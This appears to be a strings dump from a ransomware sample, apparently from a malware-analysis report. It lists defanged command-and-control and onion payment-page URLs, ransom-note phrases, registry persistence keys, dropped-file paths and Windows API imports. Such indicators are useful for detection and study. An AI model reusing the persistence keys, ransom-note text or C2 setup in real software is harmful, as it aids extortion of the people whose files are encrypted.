pNZB5UwYJrnaDTPPtJDdLQgJT9JoMEHLYuljWDpRzNf0v3V99J90vt7VsK/ohkipDWieMHbUzE48 6XSI D2IhAaNJkRJb5zq18IxyrW9hIOwJkfbIqq/7FpbC6pUQypnjwF8CkbK4DcWs65CvfRlc7ry/oJbINCpi7qNh7Nwq4YcQlWDtZTYSJ5aVR0jg4yftMTqjiJ5/Umto/WDO8OO0eWWy7GRZ26jKSrMuKnINpBIiuRw/WrWlXdKiayMKBI7AebWNh0/0IvkbRnww96SmbcyW/qdL VMuMW9/Dm9l2oFiNoSa0jWGUONgtyCdITzjq7aY4KuAqr9QwFmXpjFRRPfPjD3d0T8JkLyMET/0h0XSzYSMrhfcflp1VAJ98a B89n/tdKNZGzfjaiL4WzPERDvO6L6unekgvemq vmV07IzVEHo7nKNU4SG5pJpYU/HHpm3rl5PblmSvVR2iZElreEffOV2vJMR7RtHDRnYaQl NVn8VI2//qI62/sa5Mv4a1IbF03V/AJA11UTKk2TbghJpiFOCYafOIQNKDorhpm4nPF75tvfDzN3dZvjoxCDTZI9oiSFRVkN1ozGe/KptutADFIlDbEKbjtT3Vnuh9eUx1XP/8y9kaCC0wbWD1mVcdbNxlpEqqwgQzIMmZXrdUfv5uRPGBEX2aj6adT9wl5cGi9V7WHCweEhUdSEgIkNjBhVLiEaO0JeZ6PzPB4sJFdGDoMB67b0b1hEGnmumRmMo4f69pXYEcBjp/ergorvIzpyXsG1ez0LtaGSj95S6Dg2NQW1TQRoIvQXsDGGsqOhNn01NAfmiNtbq27QD2Z9cZ/QNZt BZ0wVrWf4 BkdHtpo3JV5qq3F8TOh3bziaO42pZP bI5uQRQQfjrnbnoRP9x75yMqn8XIs4tOC7wA9WCJt5qaHRex7pIxUiQvWVZyU6S1vatTqxwmMwwzkuZ3Qt6ccmmf3SVMsMSIJCYAjU5sd0D1ImchzdPsegz2FKzLv0AOns2BTCfJFIrJc/xKaxGDAU7hwUf0VKhJiRRlttQ8gGo6Z7EANwiWmKTPPkbaU9661sy1Rpc87gOvFhKjpwRakETjQt10rgaeYd3CjZODl97x WspMErmucdkoZTpV7cRdxgiPwfQseCgJaSPQjmF9l8wpp/R4vQxuOGtBvZzqNXA8atNVHfoNgK1CI/nVzZChp6Xffpqnp3ICtlgOTvp1myb40qZGbyCbRR/m39IAmt2S4HvWx/wxCtIjxAB5aKPHWd0lmBl7nWXJASCAXO8bhx4nNIoX9aSo9XRV0QQUuhUtS122Ny2A2cw163xF3BvE/99vitwQ/Mi42Q4gQ940DYtb9ZN9aYiM3qT3tlSncywJ8TPSnzGEtnCO7CLX8t102iJxlLlz3JCm2YN TKcbejweZS7WYshCA0OpTee60PojcbiRNvLXAbJyxIrvOlhKIu2SyltQ23xQP6irlrCKRXDdMuixJXHT2TxKOHK/Al6OZi8v31DqZd3Ix2qi dfxtE/7HJj/8LNjhuLVVFu/jUy3 JEz14jgBWHXBYcNDaKLEip THy64RwnMdFqfxUHvKmq7r4Vm/XoTVC2DbVyK/DvkrRoZa9QxlF4CEGfyg/Fjh5XTV0S8skFE0ycLCwXTDg7tmWGYTSpBda63hXKLsMYjQk4nhI9o41Z3SBZGEwvGEm Emhww4FEV53mJJ9OheidfMr6jAR0JLTXAzrd78zwIqBm4BMY2htIcfbJCK9yiBWEYJ27PfKpuKo/hgieh4uIbs2gtIic1ND33oDGmcnL3is7v/zW JV jL7ZHjtNxVS7aICe O5N3LFj/nvbjsEyJqQAs5wiR1AiiIJlbawL4UoKH/1r2uKsBLyqixAgARrePzAXnl046IddKMr9vm1UFb6XQjDhyGxco MVJyDZLvVG8RYsqVjzUknX/TumH/IyBcvTcTsHXEFaBRMBaJUs9wFYDdCOfyhDRpUO1K3xdrSKOFpGWDoz4GERNyscdrCQ84kkeWZzx1i25 1YkmC4SMDNdhM4DyMO6aGUoNjaZ/PuGNdvcloBaI9HBewCu8UYWKc2COXo6cDWHHsSkKPVlgmX2Oth9LMFeMpQbnFr7f2LXQ3anmGs NmjG3TWL k1M5ZqOvQt5QSTY4Td1RaZqIIs0A0zHFmsGwGJVEJo03qMV0u7GfWVAqDmWsMfmqH1ul7rPIqxi cEfOq37oiCYskRQL0XOFo/ceMtQX1Riyt2eK7SSOp79FJXZXDivw8u51dBShLD2G47YGWF9ZYvRmtglABo3Zc1ibTq6Wl0gexl2afz GbFVxC7lMgXf5vWEB0Mj4XZoPkIs4ddaiMW1cr7S6Vc05Vn1DoqPdPenyLI nrbJpXOFEoN2wte7h==

shells5: %s

shells5: %s

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

hXXps://djdkduep62kz4nzx.tor2web.org/inst.php

hXXps://djdkduep62kz4nzx.tor2web.org/inst.php

hXXps://djdkduep62kz4nzx.onion.to/inst.php

hXXps://djdkduep62kz4nzx.onion.to/inst.php

hXXps://djdkduep62kz4nzx.onion.to

hXXps://djdkduep62kz4nzx.onion.to

hXXps://djdkduep62kz4nzx.tor2web.org

hXXps://djdkduep62kz4nzx.tor2web.org

Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

%s?%s

%s?%s

%s %d %s

%s %d %s

MAC Address: %2X-%2X-%2X-%2X-%2X-%2X

MAC Address: %2X-%2X-%2X-%2X-%2X-%2X

kernel32.dll

kernel32.dll

advapi32.dll

advapi32.dll

user32.dll

user32.dll

ws2_32.dll

ws2_32.dll

ntdll.dll

ntdll.dll

winsta.dll

winsta.dll

shell32.dll

shell32.dll

wininet.dll

wininet.dll

urlmon.dll

urlmon.dll

nspr4.dll

nspr4.dll

ssl3.dll

ssl3.dll

winmm.dll

winmm.dll

cabinet.dll

cabinet.dll

opera.dll

opera.dll

Gdi32.dll

Gdi32.dll

gdiplus.dll

gdiplus.dll

crypt32.dll

crypt32.dll

SHLWAPI.dll

SHLWAPI.dll

Imagehlp.dll

Imagehlp.dll

psapi.dll

psapi.dll

olE32.dll

olE32.dll

winspool.drv

winspool.drv

PSAPI.DLL

PSAPI.DLL

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegCreateKeyExW

RegCreateKeyExW

RegFlushKey

RegFlushKey

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteExW

ShellExecuteExW

ShellExecuteExA

ShellExecuteExA

ShellExecuteW

ShellExecuteW

SHELL32.dll

SHELL32.dll

ole32.dll

ole32.dll

MPR.dll

MPR.dll

InternetCrackUrlA

InternetCrackUrlA

InternetOpenUrlW

InternetOpenUrlW

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

WININET.dll

WININET.dll

GetCPInfo

GetCPInfo

8$4,8$4

8$4,8$4

2.0.5b

2.0.5b

bn(%d,%d)

bn(%d,%d)

194.242.96.218

194.242.96.218

1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

2. hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

2. hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

3. hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

3. hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273

3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273

hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

Your personal page (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273

Your personal page (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273

1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273

2.hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

2.hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

3.hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

3.hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273

3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273

Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273

hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273

Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273

Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273

6 7 757}7

6 7 757}7

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

%s\system32\cmd.exe

%s\system32\cmd.exe

/c start "" "%s"

/c start "" "%s"

:Zone.Identifier

:Zone.Identifier

3334-55223-6663426

3334-55223-6663426

%s\RESTORE_FILES.TXT

%s\RESTORE_FILES.TXT

%s\RESTORE_FILES.HTML

%s\RESTORE_FILES.HTML

%s\%s

%s\%s

%s\vcw%s.exe

%s\vcw%s.exe

o%systemroot%\system32\

o%systemroot%\system32\

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

hXXp://ipinfo.io/ip

hXXp://ipinfo.io/ip

%s\restore_files_%s.txt

%s\restore_files_%s.txt

%s\restore_files_%s.html

%s\restore_files_%s.html

Software\%s

Software\%s

S-1-5-18\Software\%s

S-1-5-18\Software\%s

%X%X%X%X%X%X%X%X

%X%X%X%X%X%X%X%X

CADVAPI32.DLL

CADVAPI32.DLL

KERNEL32.DLL

KERNEL32.DLL

NETAPI32.DLL

NETAPI32.DLL

%Documents and Settings%\%current user%\Application Data\vcwuwa.exe

%Documents and Settings%\%current user%\Application Data\vcwuwa.exe

%Documents and Settings%\%current user%\Application Data\vcwuwa.exe:Zone.Identifier

%Documents and Settings%\%current user%\Application Data\vcwuwa.exe:Zone.Identifier

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Desktop

%Documents and Settings%\%current user%\Desktop

%Documents and Settings%\All Users\Desktop

%Documents and Settings%\All Users\Desktop

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning

%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning

%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt

%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt

1.0.0.1

1.0.0.1

vcwuwa.exe_1980_rwx_00390000_00004000:

ADVAPI32.DLL

ADVAPI32.DLL

USER32.DLL

USER32.DLL

EnumWindows

EnumWindows

_acmdln

_acmdln

RegCloseKey

RegCloseKey